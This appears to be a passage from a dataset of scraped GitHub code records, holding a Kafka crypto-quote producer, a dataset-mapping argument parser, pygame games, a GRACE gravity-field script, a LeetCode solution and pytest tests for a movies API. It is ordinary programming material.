"line_number": 119, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 119, "usage_type": "name"}, {"api_name": "src.summary_lib.filter_summary_data", "line_number": 120, "usage_type": "call"}, {"api_name": "src.summary_lib", "line_number": 120, "usage_type": "name"}, {"api_name": "src.resources.colour_palette", "line_number": 131, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 135, "usage_type": "call"}, {"api_name": "plotly.express.bar", "line_number": 139, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 139, "usage_type": "name"}, {"api_name": "src.summary_lib.filter_summary_data", "line_number": 140, "usage_type": "call"}, {"api_name": "src.summary_lib", "line_number": 140, "usage_type": "name"}, {"api_name": "src.resources.colour_palette", "line_number": 151, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 155, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 156, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 160, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 161, "usage_type": "call"}, {"api_name": "streamlit.columns", "line_number": 162, "usage_type": "call"}, {"api_name": "src.feedback_lib.feedback_all_mean", "line_number": 168, "usage_type": "call"}, {"api_name": "src.feedback_lib", "line_number": 168, "usage_type": "name"}, {"api_name": "src.feedback_lib.feedback_all_nps_percentages", "line_number": 174, "usage_type": "call"}, {"api_name": "src.feedback_lib", "line_number": 174, "usage_type": "name"}, {"api_name": "src.feedback_lib.feedback_all_nps_percentages", "line_number": 180, "usage_type": "call"}, {"api_name": "src.feedback_lib", "line_number": 180, "usage_type": "name"}, {"api_name": "src.feedback_lib.feedback_all_nps_percentages", "line_number": 186, "usage_type": "call"}, {"api_name": "src.feedback_lib", "line_number": 186, "usage_type": "name"}, {"api_name": "streamlit.write", "line_number": 192, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 195, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 196, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 200, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 203, "usage_type": "call"}, {"api_name": "streamlit.tabs", "line_number": 
205, "usage_type": "call"}, {"api_name": "streamlit.header", "line_number": 209, "usage_type": "call"}, {"api_name": "src.feedback_lib.feedback_questions_average", "line_number": 210, "usage_type": "call"}, {"api_name": "src.feedback_lib", "line_number": 210, "usage_type": "name"}, {"api_name": "plotly.express.bar", "line_number": 212, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 212, "usage_type": "name"}, {"api_name": "src.resources.colour_palette", "line_number": 226, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 232, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 235, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 236, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 237, "usage_type": "call"}, {"api_name": "data_sources.google_sheets.load_sentiment_data", "line_number": 239, "usage_type": "call"}, {"api_name": "data_sources.google_sheets", "line_number": 239, "usage_type": "name"}, {"api_name": "plotly.subplots.make_subplots", "line_number": 255, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Bar", "line_number": 259, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 259, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Bar", "line_number": 272, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 272, "usage_type": "name"}, {"api_name": "src.resources.colour_palette", "line_number": 285, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 293, "usage_type": "call"}, {"api_name": "streamlit.header", "line_number": 306, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 310, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 311, "usage_type": "call"}, {"api_name": "src.feedback_lib.feedback_questions_average", "line_number": 312, "usage_type": "call"}, {"api_name": "src.feedback_lib", "line_number": 312, "usage_type": "name"}, {"api_name": "plotly.express.bar", "line_number": 318, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 318, "usage_type": "name"}, {"api_name": "src.resources.colour_palette", "line_number": 337, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 343, "usage_type": "call"}, {"api_name": "streamlit.header", "line_number": 347, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 348, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 349, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 350, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 351, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 352, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 353, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 354, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 360, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 361, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 365, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 371, "usage_type": "call"}, {"api_name": "src.util.add_footer", "line_number": 374, "usage_type": "call"}]} +{"seq_id": "8401654080", "text": "from argparse import ArgumentParser\n\n\ndef create_parser():\n \"\"\"Create argument parser of the script.\n\n Returns\n -------\n p : argparse.ArgumentParser\n Parser of the script.\n 
\"\"\"\n p = ArgumentParser(\n description=\"Map a source dataset to a target dataset \"\n \"given a mapping file in JSON format generated by the \"\n \"MIP Dataset Mapper UI application (mip_dataset_mapper_ui).\"\n )\n p.add_argument(\n \"--source_dataset\",\n required=True,\n help=\"Source dataset file in CSV format.\",\n )\n p.add_argument(\n \"--mapping_file\",\n required=True,\n help=\"Source Dataset Columns / Common data elements (CDEs) mapping file in JSON format. \"\n \"The mapping file can be generated by the MIP Dataset Mapper UI application.\",\n )\n p.add_argument(\n \"--cdes_file\",\n required=True,\n help=\"Common data elements (CDEs) metadata schema file in EXCEL format. \",\n )\n p.add_argument(\n \"--target_dataset\",\n required=True,\n help=\"Path to the target / output dataset file in CSV format.\",\n )\n # p.add_argument(\n # \"--log_file\",\n # required=False,\n # default=None,\n # help=\"Path to output log file. \"\n # \"If not provided, the log file will be saved in the same directory \"\n # \"as the source dataset file with the name `dataset_mapping.log`.\",\n # )\n return p\n", "repo_name": "HBPMedical/mip-dmp", "sub_path": "mip_dmp/utils/parser.py", "file_name": "parser.py", "file_ext": "py", "file_size_in_byte": 1434, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "6927639078", "text": "\"\"\"\r\nKafka Producer\r\n1. Make API calls to fetch cryptocurrency quotes\r\n2. Clean response and structure it as a list of dictionaries\r\n3. Write to kafka topic\r\n\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nfrom kafka import KafkaConsumer, KafkaProducer\r\nfrom time import sleep\r\nfrom json import dumps \r\nimport json\r\nimport time\r\n\r\nfrom requests import Request, Session\r\nfrom requests.exceptions import ConnectionError, Timeout, TooManyRedirects\r\nimport json\r\n\r\n\r\ndef key_serializer(key):\r\n return str(key).encode()\r\n\r\ndef value_serializer(value):\r\n return json.dumps(value).encode()\r\n\r\n\r\n#Call the api with argument n_calls, which specifies how many coins you want to quote\r\ndef call_api(num_coins = 1):\r\n #print(n_calls)\r\n url = 'https://pro-api.coinmarketcap.com/v1/cryptocurrency/listings/latest'\r\n parameters = {\r\n 'start':'1',\r\n 'limit':str(num_coins),# MAX = 100 \r\n 'convert':'USD'\r\n }\r\n headers = {\r\n 'Accepts': 'application/json',\r\n 'X-CMC_PRO_API_KEY': '',\r\n }\r\n session = Session()\r\n session.headers.update(headers)\r\n try:\r\n response = session.get(url, params=parameters)\r\n data = json.loads(response.text)\r\n \r\n except (ConnectionError, Timeout, TooManyRedirects) as e:\r\n print(e)\r\n data = None\r\n return data\r\n\r\n#Function 2: Make n number of api calls and extract the desired contents of response\r\ndef fetch_btc_data(num_coins):\r\n data = call_api(num_coins)\r\n if data != None:\r\n quote_key_list = ['volume_24h','volume_change_24h','percent_change_1h','percent_change_24h','percent_change_7d','market_cap_dominance','last_updated']\r\n main_dict = {}\r\n #iterate through all coins that were requested in the api call\r\n for i in range(len(data['data'])):\r\n coin_name = data['data'][i]['name']\r\n coin_quote = data['data'][i]['quote']['USD']\r\n filtered_quote = {key: coin_quote[key] for key in quote_key_list if key in coin_quote} #filter out the specific key value pairs that you want\r\n filtered_quote['Coin'] = coin_name\r\n 
main_dict[coin_name] = filtered_quote\r\n return main_dict\r\n else:\r\n print(\"Error with API call\")\r\n return None\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\nbootstrap_server_ip= 'ec2-__-___-114-23.compute-1.amazonaws.com'\r\nkafka_topic = 'trial'\r\n\r\n#Step 1: Create a kafka producer\r\nproducer = KafkaProducer(bootstrap_servers=[bootstrap_server_ip], #change ip here\r\n value_serializer=lambda x: dumps(x).encode('utf-8'))\r\n # convert x to json and then serialized to utf-8 because Kafka stores and transmits messages as byte arrays\r\n\r\n#this can be orchestrated with airflow or any work orchestration tool\r\n#Define how many calls to be made, number of coins to quote, delay in seconds\r\n#Write the cleaned response to the kafka topic\r\ndef generate_quotes_send_s3(num_calls, num_coins,delay):\r\n for i in range(num_calls):\r\n producer.send(kafka_topic, value=fetch_btc_data(num_coins))\r\n time.sleep(delay)\r\n\r\ngenerate_quotes_send_s3(10,5,30)", "repo_name": "NpEric360/Realtime_ETL_Pipeline", "sub_path": "producer.py", "file_name": "producer.py", "file_ext": "py", "file_size_in_byte": 3085, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.dumps", "line_number": 26, "usage_type": "call"}, {"api_name": "requests.Session", "line_number": 42, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 46, "usage_type": "call"}, {"api_name": "requests.exceptions.ConnectionError", "line_number": 48, "usage_type": "name"}, {"api_name": "requests.exceptions.Timeout", "line_number": 48, "usage_type": "name"}, {"api_name": "requests.exceptions.TooManyRedirects", "line_number": 48, "usage_type": "name"}, {"api_name": "kafka.KafkaProducer", "line_number": 82, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 83, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 92, "usage_type": "call"}]} +{"seq_id": "28020321732", "text": "import sortedcontainers\nclass Solution:\n def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:\n q = deque()\n ret = []\n for i, num in enumerate(nums):\n while len(q) and num >= q[-1][0]:\n q.pop()\n q.append((num, i))\n if i >= k-1:\n ret.append(q[0][0])\n if i-k+1 == q[0][1]:\n q.popleft()\n return ret\n\n\nclass Solution2:\n def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:\n d = sortedcontainers.SortedDict()\n ret = []\n for num in nums[:k-1]:\n d[num] = d.setdefault(num, 0) + 1\n for i, num in enumerate(nums[k-1:]):\n d[num] = d.setdefault(num, 0) + 1\n ret.append(d.peekitem()[0])\n if d[nums[i]] == 1:\n del d[nums[i]]\n else:\n d[nums[i]] -= 1\n return ret\n", "repo_name": "balwierz/LeetCode", "sub_path": "239 Sliding Window Maximum.py", "file_name": "239 Sliding Window Maximum.py", "file_ext": "py", "file_size_in_byte": 924, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sortedcontainers.SortedDict", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "34657011804", "text": "import random\nimport pygame\nimport tile_classes\nimport variables\n\nclass island():\n\t__slots__ = (\"surf\", \"underground\", \"top\", \"top_c\")\n\n\tdef __init__(self, size, surf_height):\n\t\tstart = random.randint(3, int(size * 0.15))\n\t\tend = random.randint(int(size * 0.85), size - 2)\n\t\tself.surf = [[x, surf_height] for x in range(start, end)]\n\t\tself.underground = []\n\t\tunderground = [[x, surf_height + 1] for x in range(start, 
end)]\n\t\tfor i in range(4):\n\t\t\tself.underground += [[x, y + i] for x, y in underground]\n\t\t\ttry:\n\t\t\t\tdel underground[0:random.randint(1, 4)]\n\t\t\t\tl = len(underground)\n\t\t\t\tdel underground[-random.randint(1, 4):-1]\n\t\t\t\tdel underground[-1]\n\t\t\texcept:\n\t\t\t\tpass\n\n\t\tbackup = self.surf[1:]\n\t\tself.top = []\n\t\tfor i in range(random.randint(5, 8)):\n\t\t\ttile = random.choice(backup)\n\t\t\tself.top.append([tile_classes.create_class(\"trees\", tile, 0)])\n\t\t\tbackup.remove(tile)\n\t\tfor i in range(random.randint(2, 3)):\n\t\t\ttile = random.choice(backup)\n\t\t\tself.top.append([tile_classes.create_class(\"rocks\", tile, 0)])\n\t\t\tbackup.remove(tile)\n\t\tfor i in range(random.randint(1, 2)):\n\t\t\ttile = random.choice(backup)\n\t\t\tself.top.append([tile_classes.create_class(\"ruins\", tile, 0)])\n\t\t\tbackup.remove(tile)\n\t\tfor tile in backup:\n\t\t\tself.top.append([tile_classes.create_class(\"grass\", tile, 0)])\n\t\tself.top.append([tile_classes.create_class(\"ship\", [self.surf[0][0], self.surf[0][1]], 0)])\n\n\tdef draw_island(self, t_size, window):\n\t\tfor su in self.surf:\n\t\t\tpygame.draw.rect(window, (variables.grass_green), (su[0] * t_size, su[1] * t_size, t_size, t_size))\n\n\t\tfor un in self.underground:\n\t\t\tpygame.draw.rect(window, (variables.rock_grey), (un[0] * t_size, un[1] * t_size, t_size, t_size))\n\n\t\tfor tower in self.top:\n\t\t\tfor tile in tower:\n\t\t\t\tif tile.image != None:\n\t\t\t\t\twindow.blit(tile.image, (tile.coords[0] * t_size, (tile.coords[1] - 1) * t_size))", "repo_name": "4b3c/floating_island_game", "sub_path": "island.py", "file_name": "island.py", "file_ext": "py", "file_size_in_byte": 1838, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "random.randint", "line_number": 10, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 11, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 18, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 20, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 27, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 28, "usage_type": "call"}, {"api_name": "tile_classes.create_class", "line_number": 29, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 31, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 32, "usage_type": "call"}, {"api_name": "tile_classes.create_class", "line_number": 33, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 35, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 36, "usage_type": "call"}, {"api_name": "tile_classes.create_class", "line_number": 37, "usage_type": "call"}, {"api_name": "tile_classes.create_class", "line_number": 40, "usage_type": "call"}, {"api_name": "tile_classes.create_class", "line_number": 41, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 45, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 45, "usage_type": "attribute"}, {"api_name": "variables.grass_green", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 48, "usage_type": "attribute"}, {"api_name": "variables.rock_grey", "line_number": 48, "usage_type": "attribute"}]} +{"seq_id": "30098801431", "text": "import pygame, random, os\nfrom card import Card\n\nimages = 
os.listdir('emojis')\n\ndef _get_random_emoji():\n emoji = images.pop(random.randint(0, len(images)-1))\n return os.path.join('emojis', emoji)\n\ndef _resize_surface(surface, mult):\n new_size = (int(surface.get_width()*mult), int(surface.get_height()*mult))\n return pygame.transform.scale(surface, new_size)\n\ndef _get_empty_matrix():\n matrix = []\n for i in range(4):\n matrix.append([])\n for j in range(4):\n matrix[i].append(0)\n return matrix\n\ndef get_random_game_grid(surface_size):\n matrix = _get_empty_matrix()\n\n # Create a list with 8 pairs of emojis. For a total of 16 emojis for the 4x4 grid.\n emojis = []\n for i in range(8):\n\n random_emoji = _get_random_emoji()\n emojis.append(random_emoji)\n emojis.append(random_emoji)\n random.shuffle(emojis)\n \n\n # Fill matrix with cards that have emojis and rects\n # Each loop it pops an emoji from the shuffled emoji list\n eigths = [surface_size*1/8, surface_size*3/8, surface_size*5/8, surface_size*7/8]\n \n for y, i in zip(range(4), eigths):\n for x, j in zip(range(4), eigths):\n emoji_name = emojis.pop()\n emoji_surface = pygame.image.load(emoji_name)\n emoji_surface.convert_alpha()\n emoji_surface = _resize_surface(emoji_surface, 0.27)\n\n rect = pygame.Rect(0, 0, 130, 130)\n rect.center = (i, j)\n \n matrix[y][x] = Card(emoji_surface, rect, emoji_name)\n\n return(matrix)", "repo_name": "lucasfstmd/CC-UEPB", "sub_path": "1° Periodo/Algoritimos/Trabalho 1/combinar_pares 0.2/game_grid_generator.py", "file_name": "game_grid_generator.py", "file_ext": "py", "file_size_in_byte": 1562, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.listdir", "line_number": 4, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 12, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 12, "usage_type": "attribute"}, {"api_name": "random.shuffle", "line_number": 32, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 42, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 42, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 46, "usage_type": "call"}, {"api_name": "card.Card", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "10782078119", "text": "#!/usr/local/bin/python3\n\n'''\nCalculating the Equivalent Water Height (EWH) due to gravity change between \ntwo GRACE monthly solutions. This example calculates the EWH from gravity\nchange between May 2002 and May 2017 for Greenland using the ITSG-GRACE2016 \ngravity field. Spatial averaging using a Gaussian filter is used for \ndestriping. See also: \nWahr, J. (2015): Time Variable Gravity Fields from Satellites. In: Herring, \nT.A. (Ed.): Treatise on Geophysics, Vol 3, pp 193-213.\n\nThis example does NOT include corrections for additional gravity effects,\ne.g., GIA or leakage. \n\nThe intend of this demo is solely to give an example of the evaluation of \ngravity field solutions provided in spherical harmonic coefficients.\n\nFor other locations change the variables lat and lon, where the latitude is\nthe polar distance, or colatitude, ranging from 0° to 180°. For other Epochs \nchange file1 and file 2. 
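For example, a geographic latitude of 72°N (central Greenland) corresponds to a \ncolatitude of 90° - 72° = 18° in this convention. 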
\n\nITSG-GRACE2016 Reference: \nMayer-Gürr, Torsten; Behzadpour, Saniya; Ellmer, Matthias; Kvas, Andreas; \nKlinger, Beate; Zehentner, Norbert (2016): ITSG-Grace2016 - Monthly and Daily \nGravity Field Solutions from GRACE. GFZ Data Services. \nhttp://doi.org/10.5880/icgem.2016.007\n\nPlotting of the results requires the cartopy package. See documentation at\nhttps://scitools.org.uk/cartopy/docs/latest/index.html\nCartopy will download the necessary coastlines\n'''\n\nimport numpy as np\nimport multiprocessing as mp\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as mticker\nimport pyfunc.plot_grav_field_libs as pgfl\nfrom cartopy import crs as ccrs\nfrom cartopy.mpl.gridliner import LatitudeFormatter , LongitudeFormatter\n\ndef ewh_calc():\n p = mp.Pool(mp.cpu_count())\n res=[p.apply_async(pgfl.waterheight, args = (rlam, ele , dc, ds, deg_max,lf,kn)) \n for ele in rlat \n ]\n p.close()\n p.join()\n ewh=np.zeros((len(rlat),len(rlam)+1))\n for hi in range(0,len(rlat)):\n ewh[hi,:] = res[hi].get()\n ewh= ewh[ewh[:,0].argsort()]\n ewh=np.delete(ewh, np.s_[0], axis=1)\n return ewh\n\n# define common parameters\ndeg_max = 90\ndeg_list = np.arange(2, deg_max+1, 1) # from degree 2 to deg_max\nR=6378.136 # Earth radius in km \nfilterradius = 300.0 # filter radius in km; 0.0 for no filter\n\n# region and step size of grid to calculate EWH\nlam = np.arange(-180.0, 180.0, 1.0)\nlat = np.arange(1.0, 180.0, 1.0)\nrlam=lam*np.pi/180\nrlat = lat*np.pi/180\n\n# Gravity field\n# Files can be downloaded from http://ifg.tugraz.at/ITSG-Grace2016\n# this example uses unconstrained monthly solutions of degree 120\nfile1='data/ITSG-Grace2016_n120_2002-05.gfc'\nfile2='data/ITSG-Grace2016_n120_2017-05.gfc'\n\n# read gravity field coefficients (degree, order, cnm, snm)\ncoeffi1 = np.loadtxt(file1, usecols=(1,2,3,4), skiprows= 19)\ncoeffi2 = np.loadtxt(file2, usecols=(1,2,3,4), skiprows= 19)\n# filter coefficients\nif filterradius > 0.0:\n fc=pgfl.GaussFilterCoeff(R, filterradius, deg_max)\n filter_coeff=np.outer(fc,np.ones((deg_max+1,1)))\nelse:\n filter_coeff=np.ones((deg_max+1,1))\n \n# sort coefficients into triangular matrix\ncnm1, snm1 = pgfl.coeffisort(coeffi1, deg_max)\ncnm2, snm2 = pgfl.coeffisort(coeffi2, deg_max)\n# coefficient difference\ndc=(cnm2-cnm1)*filter_coeff\nds=(snm2-snm1)*filter_coeff\n# Love numbers\nkn = pgfl.LoveNumbers(deg_max)\n# Legendre functions\nlf = pgfl.LegendreFunctions(deg_max)\n\nif __name__ == '__main__':\n # calculations\n w=ewh_calc()\n # Plot of result\n fig=plt.figure(figsize=[15,8])\n ax = plt.subplot(projection=ccrs.PlateCarree())\n imgextend = [-180, 180, -90, 90]\n t=ax.imshow(w,origin='upper',extent=imgextend, transform=ccrs.PlateCarree(),\n cmap='RdBu') \n ax.coastlines('110m') # 50m is also available\n lonLabels = np.arange(-180, 181, 60)\n latLabels = np.arange(-90, 91, 30)\n gl=ax.gridlines(draw_labels=True,color='k',linewidth=1.5)\n gl.xlocator = mticker.FixedLocator(lonLabels)\n gl.ylocator = mticker.FixedLocator(latLabels)\n gl.xformatter = LongitudeFormatter()\n gl.yformatter = LatitudeFormatter()\n \n cbar=plt.colorbar(t)\n cbar.set_label('EWH / m', rotation=90)\n plt.show()\n \n\n", "repo_name": "mikesierra7/34c3_EWH_MWE", "sub_path": "example.py", "file_name": "example.py", "file_ext": "py", "file_size_in_byte": 4158, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "multiprocessing.Pool", "line_number": 42, "usage_type": "call"}, {"api_name": 
"multiprocessing.cpu_count", "line_number": 42, "usage_type": "call"}, {"api_name": "pyfunc.plot_grav_field_libs.waterheight", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pyfunc.plot_grav_field_libs", "line_number": 43, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.s_", "line_number": 52, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 64, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 65, "usage_type": "attribute"}, {"api_name": "numpy.loadtxt", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 75, "usage_type": "call"}, {"api_name": "pyfunc.plot_grav_field_libs.GaussFilterCoeff", "line_number": 78, "usage_type": "call"}, {"api_name": "pyfunc.plot_grav_field_libs", "line_number": 78, "usage_type": "name"}, {"api_name": "numpy.outer", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 81, "usage_type": "call"}, {"api_name": "pyfunc.plot_grav_field_libs.coeffisort", "line_number": 84, "usage_type": "call"}, {"api_name": "pyfunc.plot_grav_field_libs", "line_number": 84, "usage_type": "name"}, {"api_name": "pyfunc.plot_grav_field_libs.coeffisort", "line_number": 85, "usage_type": "call"}, {"api_name": "pyfunc.plot_grav_field_libs", "line_number": 85, "usage_type": "name"}, {"api_name": "pyfunc.plot_grav_field_libs.LoveNumbers", "line_number": 90, "usage_type": "call"}, {"api_name": "pyfunc.plot_grav_field_libs", "line_number": 90, "usage_type": "name"}, {"api_name": "pyfunc.plot_grav_field_libs.LegendreFunctions", "line_number": 92, "usage_type": "call"}, {"api_name": "pyfunc.plot_grav_field_libs", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "cartopy.crs.PlateCarree", "line_number": 99, "usage_type": "call"}, {"api_name": "cartopy.crs", "line_number": 99, "usage_type": "name"}, {"api_name": "cartopy.crs.PlateCarree", "line_number": 101, "usage_type": "call"}, {"api_name": "cartopy.crs", "line_number": 101, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.ticker.FixedLocator", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.ticker.FixedLocator", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 108, "usage_type": "name"}, {"api_name": "cartopy.mpl.gridliner.LongitudeFormatter", "line_number": 109, "usage_type": "call"}, {"api_name": "cartopy.mpl.gridliner.LatitudeFormatter", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, 
"usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}]} +{"seq_id": "36965319549", "text": "import copy\nimport json\nimport pytest\n\nfrom api.movies import handle, UnsupportedMethod\n\n\ndef test_unsupported_method():\n event = {\n \"requestContext\": {\n \"http\": {\n \"method\": \"AA\"\n }\n },\n \"queryStringParameters\": {\n \"mal_id\": \"123\"\n }\n }\n\n with pytest.raises(UnsupportedMethod):\n handle(event, None)\n\n\nclass TestPost:\n event = {\n \"requestContext\": {\n \"http\": {\n \"method\": \"POST\"\n }\n },\n \"body\": '{\"api_id\": \"123\", \"api_name\": \"tmdb\"}'\n }\n\n def test_success(self, mocked_movies_db):\n mocked_movies_db.table.query.side_effect = mocked_movies_db.NotFoundError\n\n res = handle(self.event, None)\n\n exp = {\n \"body\": json.dumps({\"id\": \"e6d4fa11-1ad7-5137-a962-9554c8766356\"}),\n \"statusCode\": 200\n }\n assert res == exp\n\n def test_already_exist(self, mocked_movies_db):\n mocked_movies_db.table.query.return_value = {\n \"Items\": [\n {\n \"tmdb_id\": \"123\"\n }\n ]\n }\n\n res = handle(self.event, None)\n\n exp = {\n \"body\": json.dumps({\"id\": \"e6d4fa11-1ad7-5137-a962-9554c8766356\"}),\n \"statusCode\": 200\n }\n assert res == exp\n\n def test_no_body(self, mocked_movies_db):\n mocked_movies_db.table.query.return_value = {\n \"Items\": [\n {\n \"tmdb_id\": \"123\"\n }\n ]\n }\n event = copy.deepcopy(self.event)\n del event[\"body\"]\n\n res = handle(event, None)\n\n exp = {\n \"statusCode\": 400,\n \"body\": \"Invalid post body\"\n }\n assert res == exp\n\n def test_invalid_body(self, mocked_movies_db):\n mocked_movies_db.table.query.return_value = {\n \"Items\": [\n {\n \"mal_id\": 123\n }\n ]\n }\n event = copy.deepcopy(self.event)\n event[\"body\"] = '{\"aa\": \"bb\"}'\n\n res = handle(event, None)\n\n exp = {\n 'body': '{\"message\": \"Invalid post schema\", '\n '\"error\": \"Additional properties are not allowed (\\'aa\\' was unexpected)\"}',\n 'statusCode': 400\n }\n assert res == exp\n\n\nclass TestGet:\n event = {\n \"requestContext\": {\n \"http\": {\n \"method\": \"GET\"\n }\n },\n \"queryStringParameters\": {\n \"api_id\": \"123\",\n \"api_name\": \"tmdb\",\n }\n }\n\n def test_success(self, mocked_movies_db):\n exp_res = {\n \"id\": \"123\"\n }\n mocked_movies_db.table.query.return_value = {\n \"Items\": [\n exp_res\n ]\n }\n\n res = handle(self.event, None)\n\n exp = {\n \"statusCode\": 200,\n \"body\": json.dumps(exp_res)\n }\n assert res == exp\n\n def test_not_found(self, mocked_movies_db):\n mocked_movies_db.table.query.side_effect = mocked_movies_db.NotFoundError\n\n res = handle(self.event, None)\n\n exp = {\n \"statusCode\": 404,\n }\n assert res == exp\n\n def test_empty_query_params(self):\n event = copy.deepcopy(self.event)\n event[\"queryStringParameters\"] = {}\n\n res = handle(event, None)\n\n exp = {\n \"statusCode\": 400,\n \"body\": json.dumps({\"error\": \"Please specify query parameters\"})\n }\n assert res == exp\n\n def test_invalid_query_params(self):\n event = copy.deepcopy(self.event)\n event[\"queryStringParameters\"] = {\n \"abc\": \"123\"\n }\n\n res = handle(event, None)\n\n exp = {\n \"statusCode\": 400,\n \"body\": json.dumps({\"error\": \"Missing api_id query parameter\"})\n }\n assert res == exp\n\n def test_missing_api_name(self):\n event = copy.deepcopy(self.event)\n del event[\"queryStringParameters\"][\"api_name\"]\n\n res = handle(event, None)\n\n exp = {\n 
